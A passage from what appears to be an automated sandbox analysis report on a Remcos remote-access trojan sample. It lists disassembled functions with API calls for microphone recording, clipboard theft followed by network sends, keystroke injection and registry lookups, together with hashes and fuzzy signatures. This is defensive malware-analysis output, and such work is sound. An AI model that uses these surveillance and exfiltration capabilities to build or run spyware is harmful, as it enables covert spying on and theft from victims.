                                                                                                                                                                                                                                            • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                                                                                                            • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                                                                                                            • waveInStart.WINMM ref: 00401A81
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                                                                            • String ID: XCG$`=G$x=G
                                                                                                                                                                                                                                            • API String ID: 1356121797-903574159
                                                                                                                                                                                                                                            • Opcode ID: cbcac788c718bd7f67303107ca832eedb4aafd95f91c6a7e1c6cfce26f1e3068
                                                                                                                                                                                                                                            • Instruction ID: eaefd7a1fab34284b98bc4f49641b1dd71ce781583fbb4b877c049bb372049a4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbcac788c718bd7f67303107ca832eedb4aafd95f91c6a7e1c6cfce26f1e3068
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A215C316012409BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                                                                                                                            Function 0041C97F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C998
                                                                                                                                                                                                                                              • Part of subcall function 0041CA2F: RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                                                                              • Part of subcall function 0041CA2F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                                                                              • Part of subcall function 0041CA2F: GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                                                                            • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9CF
                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9E9
                                                                                                                                                                                                                                            • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9FF
                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 0041CA0B
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 0041CA15
                                                                                                                                                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA22
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                                                                            • String ID: Remcos
                                                                                                                                                                                                                                            • API String ID: 1970332568-165870891
                                                                                                                                                                                                                                            • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                                            • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                                                                                                                            Function 0044B460 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                                                                                                                                                            • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                                                                                                                                                                                                                                            Function 00452B3A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(?,?), ref: 00452BE6
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C69
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CFC
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D13
                                                                                                                                                                                                                                              • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D8F
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00452DBA
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00452DC6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3256262068-0
                                                                                                                                                                                                                                            • Opcode ID: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                                                                                                                                                            • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a84a6a5317ae172974df595155495cbc46435c9615446bda379f5f3d343e1a3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                                                                                                                                                                                                                            Function 00444409 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00444724
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044473D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0044476F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00444778
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00444784
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                            • String ID: C
                                                                                                                                                                                                                                            • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                            • Opcode ID: 4045a2e03b7b0fda526f0a9e820ad73f36c10bcbe96ad2bd9ebfcc8c6ddf23ea
                                                                                                                                                                                                                                            • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4045a2e03b7b0fda526f0a9e820ad73f36c10bcbe96ad2bd9ebfcc8c6ddf23ea
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                                                                                                                                                                                                                            Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: tcp$udp
                                                                                                                                                                                                                                            • API String ID: 0-3725065008
                                                                                                                                                                                                                                            • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                                                                                                                                            • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                                                                                                                            Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                                                                                                                                              • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                                                                                                                                              • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                                                                            • String ID: .part
                                                                                                                                                                                                                                            • API String ID: 1303771098-3499674018
                                                                                                                                                                                                                                            • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                                                                                                                                                                                            • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                                                                                                                                            Function 0041A82D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                                                                                                                                              • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                                                                                                                                              • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                                                                                                                                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0041A906
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                                                                                                                                                            • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                                                                            • API String ID: 37874593-703403762
                                                                                                                                                                                                                                            • Opcode ID: 2d91f4a49e0f0881e5ba5d04f77617b502edbcffc72823e980d0199ecd99e60e
                                                                                                                                                                                                                                            • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d91f4a49e0f0881e5ba5d04f77617b502edbcffc72823e980d0199ecd99e60e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                                                                                                                                                                                                                            Function 00449960 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004499F2
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
                                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00449AD7
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00449B47
                                                                                                                                                                                                                                              • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00449B50
                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00449B75
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2597970681-0
                                                                                                                                                                                                                                            • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                                                                                                                                                            • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                                                                                                                                                                                                                            Function 00418ACE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SendInput.USER32 ref: 00418B18
                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                                                                                                                                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                                                                                                                                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                                                                                                                                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                                                                                                                                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                                                                                                                                                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                                                                                                                                                                                                                              • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InputSend$Virtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1167301434-0
                                                                                                                                                                                                                                            • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                                                                            • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                                                                                                                                                                                                            Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenClipboard.USER32 ref: 00415A46
                                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2172192267-0
                                                                                                                                                                                                                                            • Opcode ID: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                                                                                                                                                                                                            • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 188954088982c27bf1798ee8bc1fdab4a0b1341d415165718f6a40a7b43e1a5c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                                                                                                                                                                                                            Function 00446169 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                            • String ID: a/p$am/pm$fD
                                                                                                                                                                                                                                            • API String ID: 3509577899-1143445303
                                                                                                                                                                                                                                            • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                                                                                                                                                            • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                                                                                                                                                            Function 0044F816 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                                                                                                                                            • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                                                                                                                                                            Function 00443F8B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00444096
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004440AD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004440CC
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004440E7
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004440FE
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$AllocHeap
                                                                                                                                                                                                                                            • String ID: Z7D
                                                                                                                                                                                                                                            • API String ID: 1835388192-2145146825
                                                                                                                                                                                                                                            • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                                                                                                                                            • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                                                                                                                                                            Function 0044A0D3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 0044A190
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 0044A1AB
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                                                                                                                                                            Memory Dump Source
